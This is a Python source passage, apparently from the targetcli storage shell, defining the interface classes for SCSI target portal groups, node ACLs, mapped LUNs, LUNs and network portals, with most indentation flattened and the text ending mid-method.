msg = []
fm = self.rtsnode
if fm.has_feature('discovery_auth') and fm.discovery_enable_auth:
if not (fm.discovery_password and fm.discovery_userid):
status = False
else:
status = True
if fm.discovery_authenticate_target:
msg.append("mutual disc auth")
else:
msg.append("1-way disc auth")
msg.append("Targets: %d" % len(self._children))
return (", ".join(msg), status)
def ui_command_create(self, wwn=None):
'''
        Creates a new target. The I{wwn} format depends on the transport(s)
        supported by the fabric module. If the I{wwn} is omitted, then a
        target will be created using either a randomly generated WWN of the
        proper type, or the first unused WWN in the list of possible WWNs if
        one is available. If WWNs are constrained to a list (i.e. for hardware
        target addresses) and all WWNs are in use, the target creation will
        fail. Use the B{info} command to get more information about WWN type
        and possible values.
SEE ALSO
========
B{info}
'''
self.assert_root()
target = Target(self.rtsnode, wwn, mode='create')
wwn = target.wwn
        if self.rtsnode.wwns is not None and wwn not in self.rtsnode.wwns:
self.shell.log.warning("Hardware missing for this WWN")
if target.has_feature('tpgts'):
ui_target = UIMultiTPGTarget(target, self)
self.shell.log.info("Created target %s." % wwn)
return ui_target.ui_command_create()
else:
ui_target = UITarget(target, self)
self.shell.log.info("Created target %s." % wwn)
return self.new_node(ui_target)
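    # Illustrative shell interaction for create (the WWN below is made up;
    # the exact prompt depends on the fabric module):
    #
    #     /iscsi> create iqn.2003-01.org.example:target1
    #     Created target iqn.2003-01.org.example:target1.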
def ui_complete_create(self, parameters, text, current_param):
'''
Parameter auto-completion method for user command create.
@param parameters: Parameters on the command line.
@type parameters: dict
@param text: Current text of parameter being typed by the user.
@type text: str
@param current_param: Name of parameter to complete.
@type current_param: str
@return: Possible completions
@rtype: list of str
'''
if current_param == 'wwn' and self.rtsnode.wwns is not None:
existing_wwns = [child.wwn for child in self.rtsnode.targets]
completions = [wwn for wwn in self.rtsnode.wwns
if wwn.startswith(text)
if wwn not in existing_wwns]
else:
completions = []
if len(completions) == 1:
return [completions[0] + ' ']
else:
return completions
def ui_command_delete(self, wwn):
'''
Recursively deletes the target with the specified I{wwn}, and all
objects hanging under it.
SEE ALSO
========
B{create}
'''
self.assert_root()
target = Target(self.rtsnode, wwn, mode='lookup')
target.delete()
self.shell.log.info("Deleted Target %s." % wwn)
self.refresh()
def ui_complete_delete(self, parameters, text, current_param):
'''
Parameter auto-completion method for user command delete.
@param parameters: Parameters on the command line.
@type parameters: dict
@param text: Current text of parameter being typed by the user.
@type text: str
@param current_param: Name of parameter to complete.
@type current_param: str
@return: Possible completions
@rtype: list of str
'''
if current_param == 'wwn':
wwns = [child.name for child in self.children]
completions = [wwn for wwn in wwns if wwn.startswith(text)]
else:
completions = []
if len(completions) == 1:
return [completions[0] + ' ']
else:
return completions
def ui_command_info(self):
'''
Displays information about the fabric module, notably the supported
        transport(s) and accepted B{wwn} format(s), as well as the supported
        features.
'''
fabric = self.rtsnode
self.shell.log.info("Fabric module name: %s" % self.name)
self.shell.log.info("ConfigFS path: %s" % self.rtsnode.path)
self.shell.log.info("Allowed WWN types: %s" % ", ".join(fabric.wwn_types))
if fabric.wwns is not None:
self.shell.log.info("Allowed WWNs list: %s" % ', '.join(fabric.wwns))
self.shell.log.info("Fabric module features: %s" % ', '.join(fabric.features))
self.shell.log.info("Corresponding kernel module: %s"
% fabric.kernel_module)
def ui_command_version(self):
'''
Displays the target fabric module version.
'''
version = "Target fabric module %s: %s" \
% (self.rtsnode.name, self.rtsnode.version)
self.shell.con.display(version.strip())
class UIMultiTPGTarget(UIRTSLibNode):
'''
A generic target UI that has multiple TPGs.
'''
def __init__(self, target, parent):
super(UIMultiTPGTarget, self).__init__(target.wwn, target, parent)
self.refresh()
def refresh(self):
self._children = set([])
for tpg in self.rtsnode.tpgs:
UITPG(tpg, self)
def summary(self):
try:
self.rtsnode.fabric_module.to_normalized_wwn(self.rtsnode.wwn)
        except Exception:
return ("INVALID WWN", False)
return ("TPGs: %d" % len(self._children), None)
def ui_command_create(self, tag=None):
'''
Creates a new Target Portal Group within the target. The
I{tag} must be a positive integer value, optionally prefaced
by 'tpg'. If omitted, the next available Target Portal Group
Tag (TPGT) will be used.
SEE ALSO
========
B{delete}
'''
self.assert_root()
if tag:
if tag.startswith("tpg"):
tag = tag[3:]
try:
tag = int(tag)
except ValueError:
raise ExecutionError("Tag argument must be a number.")
tpg = TPG(self.rtsnode, tag, mode='create')
if self.shell.prefs['auto_enable_tpgt']:
tpg.enable = True
if tpg.has_feature("auth"):
tpg.set_attribute("authentication", 0)
self.shell.log.info("Created TPG %s." % tpg.tag)
if tpg.has_feature("nps") and self.shell.prefs['auto_add_default_portal']:
try:
NetworkPortal(tpg, "0.0.0.0")
self.shell.log.info("Global pref auto_add_default_portal=true")
self.shell.log.info("Created default portal listening on all IPs"
" (0.0.0.0), port 3260.")
except RTSLibError:
self.shell.log.info("Default portal not created, TPGs within a " +
"target cannot share ip:port.")
ui_tpg = UITPG(tpg, self)
return self.new_node(ui_tpg)
def ui_command_delete(self, tag):
'''
Deletes the Target Portal Group with TPGT I{tag} from the target. The
I{tag} must be a positive integer matching an existing TPGT.
SEE ALSO
========
B{create}
'''
self.assert_root()
if tag.startswith("tpg"):
tag = tag[3:]
try:
tag = int(tag)
except ValueError:
raise ExecutionError("Tag argument must be a number.")
tpg = TPG(self.rtsnode, tag, mode='lookup')
tpg.delete()
self.shell.log.info("Deleted TPGT %s." % tag)
self.refresh()
def ui_complete_delete(self, parameters, text, current_param):
'''
Parameter auto-completion method for user command delete.
@param parameters: Parameters on the command line.
@type parameters: dict
@param text: Current text of parameter being typed by the user.
@type text: str
@param current_param: Name of parameter to complete.
@type current_param: str
@return: Possible completions
@rtype: list of str
'''
if current_param == 'tag':
tags = [child.name[3:] for child in self.children]
completions = [tag for tag in tags if tag.startswith(text)]
else:
completions = []
if len(completions) == 1:
return [completions[0] + ' ']
else:
return completions
class UITPG(UIRTSLibNode):
    '''
    A generic TPG UI.
    '''
    ui_desc_attributes = {
'authentication': ('number', 'If set to 1, enforce authentication for this TPG.'),
'cache_dynamic_acls': ('number', 'If set to 1 in demo mode, cache dynamically generated ACLs.'),
'default_cmdsn_depth': ('number', 'Default CmdSN (Command Sequence Number) depth.'),
'default_erl': ('number', 'Default Error Recovery Level.'),
'demo_mode_discovery': ('number', 'If set to 1 in demo mode, enable discovery.'),
'demo_mode_write_protect': ('number', 'If set to 1 in demo mode, prevent writes to LUNs.'),
'fabric_prot_type': ('number', 'Fabric DIF protection type.'),
'generate_node_acls': ('number', 'If set to 1, allow all initiators to login (i.e. demo mode).'),
'login_timeout': ('number', 'Login timeout value in seconds.'),
'netif_timeout': ('number', 'NIC failure timeout in seconds.'),
'prod_mode_write_protect': ('number', 'If set to 1, prevent writes to LUNs.'),
't10_pi': ('number', 'If set to 1, enable T10 Protection Information.'),
'tpg_enabled_sendtargets': ('number', 'If set to 1, the SendTargets discovery response advertises the TPG only if the TPG is enabled.'),
}
ui_desc_parameters = {
'AuthMethod': ('string', 'Authentication method used by the TPG.'),
'DataDigest': ('string', 'If set to CRC32C, the integrity of the PDU data part is verified.'),
'DataPDUInOrder': ('yesno', 'If set to Yes, the data PDUs within sequences must be in order.'),
'DataSequenceInOrder': ('yesno', 'If set to Yes, the data sequences must be in order.'),
'DefaultTime2Retain': ('number', 'Maximum time, in seconds, after an initial wait, before which an active task reassignment is still possible after an unexpected connection termination or a connection reset.'),
'DefaultTime2Wait': ('number', 'Minimum time, in seconds, to wait before attempting an explicit/implicit logout or an active task reassignment after an unexpected connection termination or a connection reset.'),
'ErrorRecoveryLevel': ('number', 'Recovery levels represent a combination of recovery capabilities.'),
'FirstBurstLength': ('number', 'Maximum amount in bytes of unsolicited data an initiator may send.'),
'HeaderDigest': ('string', 'If set to CRC32C, the integrity of the PDU header part is verified.'),
'IFMarker': ('yesno', 'Deprecated according to RFC 7143.'),
'IFMarkInt': ('string', 'Deprecated according to RFC 7143.'),
'ImmediateData': ('string', 'Immediate data support.'),
'InitialR2T': ('yesno', 'If set to No, the default use of R2T (Ready To Transfer) is disabled.'),
'MaxBurstLength': ('number', 'Maximum SCSI data payload in bytes in a Data-In or a solicited Data-Out iSCSI sequence.'),
'MaxConnections': ('number', 'Maximum number of connections acceptable.'),
'MaxOutstandingR2T': ('number', 'Maximum number of outstanding R2Ts per task.'),
'MaxRecvDataSegmentLength': ('number', 'Maximum data segment length in bytes the target can receive in an iSCSI PDU.'),
'MaxXmitDataSegmentLength': ('number', 'Outgoing MaxRecvDataSegmentLength sent over the wire during iSCSI login response.'),
'OFMarker': ('yesno', 'Deprecated according to RFC 7143.'),
'OFMarkInt': ('string', 'Deprecated according to RFC 7143.'),
'TargetAlias': ('string', 'Human-readable target name or description.'),
}
def __init__(self, tpg, parent):
name = "tpg%d" % tpg.tag
super(UITPG, self).__init__(name, tpg, parent)
self.refresh()
UILUNs(tpg, self)
if tpg.has_feature('acls'):
UINodeACLs(self.rtsnode, self)
if tpg.has_feature('nps'):
UIPortals(self.rtsnode, self)
if self.rtsnode.has_feature('auth') \
and os.path.exists(self.rtsnode.path + "/auth"):
for param in auth_params:
self.define_config_group_param('auth', param, 'string')
def summary(self):
tpg = self.rtsnode
status = None
msg = []
if tpg.has_feature('nexus'):
msg.append(str(self.rtsnode.nexus))
if not tpg.enable:
return ("disabled", False)
if tpg.has_feature("acls"):
if "generate_node_acls" in tpg.list_attributes() and \
int(tpg.get_attribute("generate_node_acls")):
msg.append("gen-acls")
else:
msg.append("no-gen-acls")
# 'auth' feature requires 'acls'
if tpg.has_feature("auth"):
if not int(tpg.get_attribute("authentication")):
msg.append("no-auth")
if int(tpg.get_attribute("generate_node_acls")):
# if auth=0, g_n_a=1 is recommended
status = True
else:
if not int(tpg.get_attribute("generate_node_acls")):
msg.append("auth per-acl")
else:
msg.append("tpg-auth")
status = True
if not (tpg.chap_password and tpg.chap_userid):
status = False
if tpg.authenticate_target:
msg.append("mutual auth")
else:
msg.append("1-way auth")
return (", ".join(msg), status)
def ui_getgroup_auth(self, auth_attr):
return getattr(self.rtsnode, "chap_" + auth_attr)
def ui_setgroup_auth(self, auth_attr, value):
self.assert_root()
if value is None:
value = ''
setattr(self.rtsnode, "chap_" + auth_attr, value)
def ui_command_enable(self):
'''
Enables the TPG.
SEE ALSO
========
B{disable status}
'''
self.assert_root()
if self.rtsnode.enable:
self.shell.log.info("The TPGT is already enabled.")
else:
try:
self.rtsnode.enable = True
self.shell.log.info("The TPGT has been enabled.")
except RTSLibError:
raise ExecutionError("The TPGT could not be enabled.")
def ui_command_disable(self):
'''
Disables the TPG.
SEE ALSO
========
B{enable status}
'''
self.assert_root()
if self.rtsnode.enable:
self.rtsnode.enable = False
self.shell.log.info("The TPGT has been disabled.")
else:
self.shell.log.info("The TPGT is already disabled.")
class UITarget(UITPG):
'''
A generic target UI merged with its only TPG.
'''
def __init__(self, target, parent):
super(UITarget, self).__init__(TPG(target, 1), parent)
self._name = target.wwn
self.target = target
if self.parent.name != "sbp":
self.rtsnode.enable = True
def summary(self):
try:
self.target.fabric_module.to_normalized_wwn(self.target.wwn)
        except Exception:
return ("INVALID WWN", False)
return super(UITarget, self).summary()
class UINodeACLs(UINode):
'''
A generic UI for node ACLs.
'''
def __init__(self, tpg, parent):
super(UINodeACLs, self).__init__("acls", parent)
self.tpg = tpg
self.refresh()
def refresh(self):
self._children = set([])
for name in self.all_names():
UINodeACL(name, self)
def summary(self):
return ("ACLs: %d" % len(self._children), None)
def ui_command_create(self, wwn, add_mapped_luns=None):
'''
Creates a Node ACL for the initiator node with the specified I{wwn}.
The node's I{wwn} must match the expected WWN Type of the target's
fabric module.
If I{add_mapped_luns} is omitted, the global parameter
B{auto_add_mapped_luns} will be used, else B{true} or B{false} are
accepted. If B{true}, then after creating the ACL, mapped LUNs will be
automatically created for all existing LUNs.
SEE ALSO
========
B{delete}
'''
self.assert_root()
add_mapped_luns = self.ui_eval_param(add_mapped_luns, 'bool',
self.shell.prefs['auto_add_mapped_luns'])
node_acl = NodeACL(self.tpg, wwn, mode="create")
ui_node_acl = UINodeACL(node_acl.node_wwn, self)
self.shell.log.info("Created Node ACL for %s" % node_acl.node_wwn)
if add_mapped_luns:
for lun in self.tpg.luns:
MappedLUN(node_acl, lun.lun, lun.lun, write_protect=False)
self.shell.log.info("Created mapped LUN %d." % lun.lun)
self.refresh()
return self.new_node(ui_node_acl)
def ui_command_delete(self, wwn):
'''
Deletes the Node ACL with the specified I{wwn}.
SEE ALSO
========
B{create}
'''
self.assert_root()
node_acl = NodeACL(self.tpg, wwn, mode='lookup')
node_acl.delete()
self.shell.log.info("Deleted Node ACL %s." % wwn)
self.refresh()
def ui_complete_delete(self, parameters, text, current_param):
'''
Parameter auto-completion method for user command delete.
@param parameters: Parameters on the command line.
@type parameters: dict
@param text: Current text of parameter being typed by the user.
@type text: str
@param current_param: Name of parameter to complete.
@type current_param: str
@return: Possible completions
@rtype: list of str
'''
if current_param == 'wwn':
wwns = [acl.node_wwn for acl in self.tpg.node_acls]
completions = [wwn for wwn in wwns if wwn.startswith(text)]
else:
completions = []
if len(completions) == 1:
return [completions[0] + ' ']
else:
return completions
def find_tagged(self, name):
for na in self.tpg.node_acls:
if na.node_wwn == name:
yield na
elif na.tag == name:
yield na
def all_names(self):
names = set([])
for na in self.tpg.node_acls:
if na.tag:
names.add(na.tag)
else:
names.add(na.node_wwn)
return names
def ui_command_tag(self, wwn_or_tag, new_tag):
'''
Tag a NodeACL.
Usage: tag <wwn_or_tag> <new_tag>
Tags help manage initiator WWNs. A tag can apply to one or
more WWNs. This can give a more meaningful name to a single
initiator's configuration, or allow multiple initiators with
identical settings to be configured en masse.
The WWNs described by <wwn_or_tag> will be given the new
tag. If new_tag already exists, its new members will adopt the
current tag's configuration.
Within a tag, the 'info' command shows the WWNs the tag applies to.
Use 'untag' to remove tags.
NOTE: tags are only supported in kernel 3.8 and above.
'''
if wwn_or_tag == new_tag:
return
# Since all WWNs have a '.' in them, let's avoid confusion.
if '.' in new_tag:
raise ExecutionError("'.' not permitted in tag names.")
src = list(self.find_tagged(wwn_or_tag))
if not src:
raise ExecutionError("wwn_or_tag %s not found." % wwn_or_tag)
old_tag_members = list(self.find_tagged(new_tag))
# handle overlap
src_wwns = [na.node_wwn for na in src]
old_tag_members = [old for old in old_tag_members if old.node_wwn not in src_wwns]
for na in src:
na.tag = new_tag
# if joining a tag, take its config
if old_tag_members:
model = old_tag_members[0]
for mlun in na.mapped_luns:
mlun.delete()
for mlun in model.mapped_luns:
MappedLUN(na, mlun.mapped_lun, mlun.tpg_lun, mlun.write_protect)
if self.parent.rtsnode.has_feature("auth"):
for param in auth_params:
setattr(na, "chap_" + param, getattr(model, "chap_" + param))
for item in model.list_attributes(writable=True):
na.set_attribute(item, model.get_attribute(item))
for item in model.list_parameters(writable=True):
na.set_parameter(item, model.get_parameter(item))
self.refresh()
def ui_command_untag(self, wwn_or_tag):
'''
Untag a NodeACL.
Usage: untag <tag>
Remove the tag given to one or more initiator WWNs. They will
return to being displayed by WWN in the configuration tree, and
will maintain settings from when they were tagged.
'''
for na in list(self.find_tagged(wwn_or_tag)):
na.tag = None
self.refresh()
def ui_complete_tag(self, parameters, text, current_param):
'''
Parameter auto-completion method for user command tag
@param parameters: Parameters on the command line.
@type parameters: dict
@param text: Current text of parameter being typed by the user.
@type text: str
@param current_param: Name of parameter to complete.
@type current_param: str
@return: Possible completions
@rtype: list of str
'''
if current_param == 'wwn_or_tag':
completions = [n for n in self.all_names() if n.startswith(text)]
else:
completions = []
if len(completions) == 1:
return [completions[0] + ' ']
else:
return completions
ui_complete_untag = ui_complete_tag
class UINodeACL(UIRTSLibNode):
'''
A generic UI for a node ACL.
Handles grouping multiple NodeACLs in UI via tags.
All gets are performed against first NodeACL.
All sets are performed on all NodeACLs.
This is to make management of multiple ACLs easier.
'''
ui_desc_attributes = {
'dataout_timeout': ('number', 'Data-Out timeout in seconds before invoking recovery.'),
'dataout_timeout_retries': ('number', 'Number of Data-Out timeout recovery attempts before failing a path.'),
'default_erl': ('number', 'Default Error Recovery Level.'),
'nopin_response_timeout': ('number', 'Nop-In response timeout in seconds.'),
'nopin_timeout': ('number', 'Nop-In timeout in seconds.'),
'random_datain_pdu_offsets': ('number', 'If set to 1, request random Data-In PDU offsets.'),
'random_datain_seq_offsets': ('number', 'If set to 1, request random Data-In sequence offsets.'),
'random_r2t_offsets': ('number', 'If set to 1, request random R2T (Ready To Transfer) offsets.'),
}
ui_desc_parameters = UITPG.ui_desc_parameters
def __init__(self, name, parent):
# Don't want to duplicate work in UIRTSLibNode, so call it but
# del self.rtsnode to make sure we always use self.rtsnodes.
self.rtsnodes = list(parent.find_tagged(name))
super(UINodeACL, self).__init__(name, self.rtsnodes[0], parent)
del self.rtsnode
if self.parent.parent.rtsnode.has_feature('auth'):
for parameter in auth_params:
self.define_config_group_param('auth', parameter, 'string')
self.refresh()
def ui_getgroup_auth(self, auth_attr):
'''
This is the backend method for getting auths attributes.
@param auth_attr: The auth attribute to get the value of.
@type auth_attr: str
@return: The auth attribute's value
@rtype: str
'''
# All should return same, so just return from the first one
return getattr(self.rtsnodes[0], "chap_" + auth_attr)
def ui_setgroup_auth(self, auth_attr, value):
'''
This is the backend method for setting auths attributes.
@param auth_attr: The auth attribute to set the value of.
@type auth_attr: str
@param value: The auth's value
@type value: str
'''
self.assert_root()
if value is None:
value = ''
for na in self.rtsnodes:
setattr(na, "chap_" + auth_attr, value)
def refresh(self):
self._children = set([])
for mlun in self.rtsnodes[0].mapped_luns:
UIMappedLUN(mlun, self)
def summary(self):
msg = []
if self.name != self.rtsnodes[0].node_wwn:
if len(self.rtsnodes) > 1:
msg.append("(group of %d)" % len(self.rtsnodes))
else:
msg.append("(%s)" % self.rtsnodes[0].node_wwn)
status = None
na = self.rtsnodes[0]
tpg = self.parent.parent.rtsnode
if tpg.has_feature("auth") and \
int(tpg.get_attribute("authentication")):
if int(tpg.get_attribute("generate_node_acls")):
msg.append("auth via tpg")
else:
status = True
if not (na.chap_password and na.chap_userid):
status = False
if na.authenticate_target:
msg.append("mutual auth")
else:
msg.append("1-way auth")
msg.append("Mapped LUNs: %d" % len(self._children))
return (", ".join(msg), status)
def ui_command_create(self, mapped_lun, tpg_lun_or_backstore, write_protect=None):
'''
Creates a mapping to one of the TPG LUNs for the initiator referenced
by the ACL. The provided I{tpg_lun_or_backstore} will appear to that
initiator as LUN I{mapped_lun}. If the I{write_protect} flag is set to
B{1}, the initiator will not have write access to the Mapped LUN.
A storage object may also be given for the I{tpg_lun_or_backstore} parameter,
in which case the TPG LUN will be created for that backstore before
mapping the LUN to the initiator. If a TPG LUN for the backstore already
exists, the Mapped LUN will map to that TPG LUN.
Finally, a path to an existing block device or file can be given. If so,
a storage object of the appropriate type is created with default parameters,
followed by the TPG LUN and the Mapped LUN.
SEE ALSO
========
B{delete}
'''
self.assert_root()
try:
mapped_lun = int(mapped_lun)
except ValueError:
raise ExecutionError("mapped_lun must be an integer")
try:
if tpg_lun_or_backstore.startswith("lun"):
tpg_lun_or_backstore = tpg_lun_or_backstore[3:]
tpg_lun = int(tpg_lun_or_backstore)
except ValueError:
try:
so = self.get_node(tpg_lun_or_backstore).rtsnode
except ValueError:
try:
so = StorageObjectFactory(tpg_lun_or_backstore)
self.shell.log.info("Created storage object %s." % so.name)
except RTSLibError:
raise ExecutionError("LUN, storage object, or path not valid")
self.get_node("/backstores").refresh()
ui_tpg = self.parent.parent
for lun in ui_tpg.rtsnode.luns:
if so == lun.storage_object:
tpg_lun = lun.lun
break
else:
lun_object = LUN(ui_tpg.rtsnode, storage_object=so)
self.shell.log.info("Created LUN %s." % lun_object.lun)
ui_lun = UILUN(lun_object, ui_tpg.get_node("luns"))
tpg_lun = ui_lun.rtsnode.lun
if tpg_lun in (ml.tpg_lun.lun for ml in self.rtsnodes[0].mapped_luns):
self.shell.log.warning(
"Warning: TPG LUN %d already mapped to this NodeACL" % tpg_lun)
for na in self.rtsnodes:
mlun = MappedLUN(na, mapped_lun, tpg_lun, write_protect)
ui_mlun = UIMappedLUN(mlun, self)
self.shell.log.info("Created Mapped LUN %s." % mlun.mapped_lun)
return self.new_node(ui_mlun)
def ui_complete_create(self, parameters, text, current_param):
'''
Parameter auto-completion method for user command create.
@param parameters: Parameters on the command line.
@type parameters: dict
@param text: Current text of parameter being typed by the user.
@type text: str
@param current_param: Name of parameter to complete.
@type current_param: str
@return: Possible completions
@rtype: list of str
'''
if current_param == 'tpg_lun_or_backstore':
completions = []
for backstore in self.get_node('/backstores').children:
for storage_object in backstore.children:
completions.append(storage_object.path)
completions.extend(lun.name for lun in self.parent.parent.get_node("luns").children)
completions.extend(complete_path(text, lambda x: stat.S_ISREG(x) or stat.S_ISBLK(x)))
completions = [c for c in completions if c.startswith(text)]
else:
completions = []
if len(completions) == 1:
return [completions[0] + ' ']
else:
return completions
def ui_command_delete(self, mapped_lun):
'''
Deletes the specified I{mapped_lun}.
SEE ALSO
========
B{create}
'''
self.assert_root()
for na in self.rtsnodes:
mlun = MappedLUN(na, mapped_lun)
mlun.delete()
self.shell.log.info("Deleted Mapped LUN %s." % mapped_lun)
self.refresh()
def ui_complete_delete(self, parameters, text, current_param):
'''
Parameter auto-completion method for user command delete.
@param parameters: Parameters on the command line.
@type parameters: dict
@param text: Current text of parameter being typed by the user.
@type text: str
@param current_param: Name of parameter to complete.
@type current_param: str
@return: Possible completions
@rtype: list of str
'''
if current_param == 'mapped_lun':
mluns = [str(mlun.mapped_lun) for mlun in self.rtsnodes[0].mapped_luns]
completions = [mlun for mlun in mluns if mlun.startswith(text)]
else:
completions = []
if len(completions) == 1:
return [completions[0] + ' ']
else:
return completions
# Override these four methods to handle multiple NodeACLs
def ui_getgroup_attribute(self, attribute):
return self.rtsnodes[0].get_attribute(attribute)
def ui_setgroup_attribute(self, attribute, value):
self.assert_root()
for na in self.rtsnodes:
na.set_attribute(attribute, value)
def ui_getgroup_parameter(self, parameter):
return self.rtsnodes[0].get_parameter(parameter)
def ui_setgroup_parameter(self, parameter, value):
self.assert_root()
for na in self.rtsnodes:
na.set_parameter(parameter, value)
def ui_command_info(self):
'''
        Since we don't have a self.rtsnode, we can't use the base
        implementation of this method. We also don't want to print node_wwn,
        but instead list *all* WWNs for this entry.
'''
info = self.rtsnodes[0].dump()
for item in ('attributes', 'parameters', "node_wwn"):
if item in info:
del info[item]
for name, value in sorted(six.iteritems(info)):
            if not isinstance(value, (dict, list)):
self.shell.log.info("%s: %s" % (name, value))
self.shell.log.info("wwns:")
for na in self.parent.find_tagged(self.name):
self.shell.log.info(na.node_wwn)
class UIMappedLUN(UIRTSLibNode):
'''
A generic UI for MappedLUN objects.
'''
def __init__(self, mapped_lun, parent):
name = "mapped_lun%d" % mapped_lun.mapped_lun
super(UIMappedLUN, self).__init__(name, mapped_lun, parent)
self.refresh()
def summary(self):
mapped_lun = self.rtsnode
is_healthy = True
try:
tpg_lun = mapped_lun.tpg_lun
except RTSLibBrokenLink:
description = "BROKEN LUN LINK"
is_healthy = False
else:
if mapped_lun.write_protect:
access_mode = 'ro'
else:
access_mode = 'rw'
description = "lun%d %s/%s (%s)" \
% (tpg_lun.lun, tpg_lun.storage_object.plugin,
tpg_lun.storage_object.name, access_mode)
return (description, is_healthy)
class UILUNs(UINode):
'''
A generic UI for TPG LUNs.
'''
def __init__(self, tpg, parent):
super(UILUNs, self).__init__("luns", parent)
self.tpg = tpg
self.refresh()
def refresh(self):
self._children = set([])
for lun in self.tpg.luns:
UILUN(lun, self)
def summary(self):
return ("LUNs: %d" % len(self._children), None)
def ui_command_create(self, storage_object, lun=None,
add_mapped_luns=None):
'''
Creates a new LUN in the Target Portal Group, attached to a storage
object. If the I{lun} parameter is omitted, the first available LUN in
the TPG will be used. If present, it must be a number greater than 0.
Alternatively, the syntax I{lunX} where I{X} is a positive number is
also accepted.
The I{storage_object} may be the path of an existing storage object,
i.e. B{/backstore/pscsi0/mydisk} to reference the B{mydisk} storage
object of the virtual HBA B{pscsi0}. It also may be the path to an
existing block device or image file, in which case a storage object
will be created for it first, with default parameters.
If I{add_mapped_luns} is omitted, the global parameter
B{auto_add_mapped_luns} will be used, else B{true} or B{false} are
accepted. If B{true}, then after creating the LUN, mapped LUNs will be
automatically created for all existing node ACLs, mapping the new LUN.
SEE ALSO
========
B{delete}
'''
self.assert_root()
add_mapped_luns = \
self.ui_eval_param(add_mapped_luns, 'bool',
self.shell.prefs['auto_add_mapped_luns'])
try:
so = self.get_node(storage_object).rtsnode
except ValueError:
try:
so = StorageObjectFactory(storage_object)
self.shell.log.info("Created storage object %s." % so.name)
except RTSLibError:
raise ExecutionError("storage object or path not valid")
self.get_node("/backstores").refresh()
if so in (l.storage_object for l in self.parent.rtsnode.luns):
raise ExecutionError("lun for storage object %s/%s already exists" \
% (so.plugin, so.name))
if lun and lun.lower().startswith('lun'):
lun = lun[3:]
lun_object = LUN(self.tpg, lun, so)
self.shell.log.info("Created LUN %s." % lun_object.lun)
ui_lun = UILUN(lun_object, self)
if add_mapped_luns:
for acl in self.tpg.node_acls:
if lun:
mapped_lun = lun
else:
mapped_lun = 0
existing_mluns = [mlun.mapped_lun for mlun in acl.mapped_luns]
if mapped_lun in existing_mluns:
mapped_lun = None
for possible_mlun in six.moves.range(MappedLUN.MAX_LUN):
if possible_mlun not in existing_mluns:
mapped_lun = possible_mlun
break
                if mapped_lun is None:
self.shell.log.warning(
"Cannot map new lun %s into ACL %s"
% (lun_object.lun, acl.node_wwn))
else:
mlun = MappedLUN(acl, mapped_lun, lun_object, write_protect=False)
self.shell.log.info("Created LUN %d->%d mapping in node ACL %s"
% (mlun.tpg_lun.lun, mlun.mapped_lun, acl.node_wwn))
self.parent.refresh()
return self.new_node(ui_lun)
def ui_complete_create(self, parameters, text, current_param):
'''
Parameter auto-completion method for user command create.
@param parameters: Parameters on the command line.
@type parameters: dict
@param text: Current text of parameter being typed by the user.
@type text: str
@param current_param: Name of parameter to complete.
@type current_param: str
@return: Possible completions
@rtype: list of str
'''
if current_param == 'storage_object':
storage_objects = []
for backstore in self.get_node('/backstores').children:
for storage_object in backstore.children:
storage_objects.append(storage_object.path)
completions = [so for so in storage_objects if so.startswith(text)]
completions.extend(complete_path(text, lambda x: stat.S_ISREG(x) or stat.S_ISBLK(x)))
else:
completions = []
if len(completions) == 1:
return [completions[0] + ' ']
else:
return completions
def ui_command_delete(self, lun):
'''
Deletes the supplied LUN from the Target Portal Group. The I{lun} must
be a positive number matching an existing LUN.
Alternatively, the syntax I{lunX} where I{X} is a positive number is
also accepted.
SEE ALSO
========
B{create}
'''
self.assert_root()
if lun.lower().startswith("lun"):
lun = lun[3:]
try:
lun_object = LUN(self.tpg, lun)
        except Exception:
raise RTSLibError("Invalid LUN")
lun_object.delete()
self.shell.log.info("Deleted LUN %s." % lun)
# Refresh the TPG as we need to also refresh acls MappedLUNs
self.parent.refresh()
def ui_complete_delete(self, parameters, text, current_param):
'''
Parameter auto-completion method for user command delete.
@param parameters: Parameters on the command line.
@type parameters: dict
@param text: Current text of parameter being typed by the user.
@type text: str
@param current_param: Name of parameter to complete.
@type current_param: str
@return: Possible completions
@rtype: list of str
'''
if current_param == 'lun':
luns = [str(lun.lun) for lun in self.tpg.luns]
completions = [lun for lun in luns if lun.startswith(text)]
else:
completions = []
if len(completions) == 1:
return [completions[0] + ' ']
else:
return completions
class UILUN(UIRTSLibNode):
'''
A generic UI for LUN objects.
'''
def __init__(self, lun, parent):
name = "lun%d" % lun.lun
super(UILUN, self).__init__(name, lun, parent)
self.refresh()
self.define_config_group_param("alua", "alua_tg_pt_gp_name", 'string')
def summary(self):
lun = self.rtsnode
is_healthy = True
try:
storage_object = lun.storage_object
except RTSLibBrokenLink:
description = "BROKEN STORAGE LINK"
is_healthy = False
else:
description = "%s/%s" % (storage_object.plugin, storage_object.name,)
if storage_object.udev_path:
description += " (%s)" % storage_object.udev_path
description += " (%s)" % lun.alua_tg_pt_gp_name
return (description, is_healthy)
def ui_getgroup_alua(self, alua_attr):
return getattr(self.rtsnode, alua_attr)
def ui_setgroup_alua(self, alua_attr, value):
self.assert_root()
if value is None:
return
setattr(self.rtsnode, alua_attr, value)
class UIPortals(UINode):
'''
A generic UI for TPG network portals.
'''
def __init__(self, tpg, parent):
super(UIPortals, self).__init__("portals", parent)
self.tpg = tpg
self.refresh()
def refresh(self):
self._children = set([])
for portal in self.tpg.network_portals:
UIPortal(portal, self)
def summary(self):
return ("Portals: %d" % len(self._children), None)
def _canonicalize_ip(self, ip_address):
"""
        rtslib expects IPv4 addresses as dotted-quad strings, and IPv6
addresses surrounded by brackets.
"""
# Contains a '.'? Must be ipv4, right?
if "." in ip_address:
return ip_address
return "[" + ip_address + "]"
def ui_command_create(self, ip_address=None, ip_port=None):
'''
Creates a Network Portal with specified I{ip_address} and
I{ip_port}. If I{ip_port} is omitted, the default port for
the target fabric will be used. If I{ip_address} is omitted,
INADDR_ANY (0.0.0.0) will be used.
Choosing IN6ADDR_ANY (::0) will listen on all IPv6 interfaces
as well as IPv4, assuming IPV6_V6ONLY sockopt has not been
set.
Note: Portals on Link-local IPv6 addresses are currently not
supported.
SEE ALSO
========
B{delete}
'''
self.assert_root()
# FIXME: Add a specfile parameter to determine default port
ip_port = self.ui_eval_param(ip_port, 'number', 3260)
ip_address = self.ui_eval_param(ip_address, 'string', "0.0.0.0")
if ip_port == 3260:
self.shell.log.info("Using default IP port %d" % ip_port)
if ip_address == "0.0.0.0":
self.shell.log.info("Binding to INADDR_ANY (0.0.0.0)")
portal = NetworkPortal(self.tpg, self._canonicalize_ip(ip_address),
ip_port, mode='create')
self.shell.log.info("Created network portal %s:%d."
% (ip_address, ip_port))
ui_portal = UIPortal(portal, self)
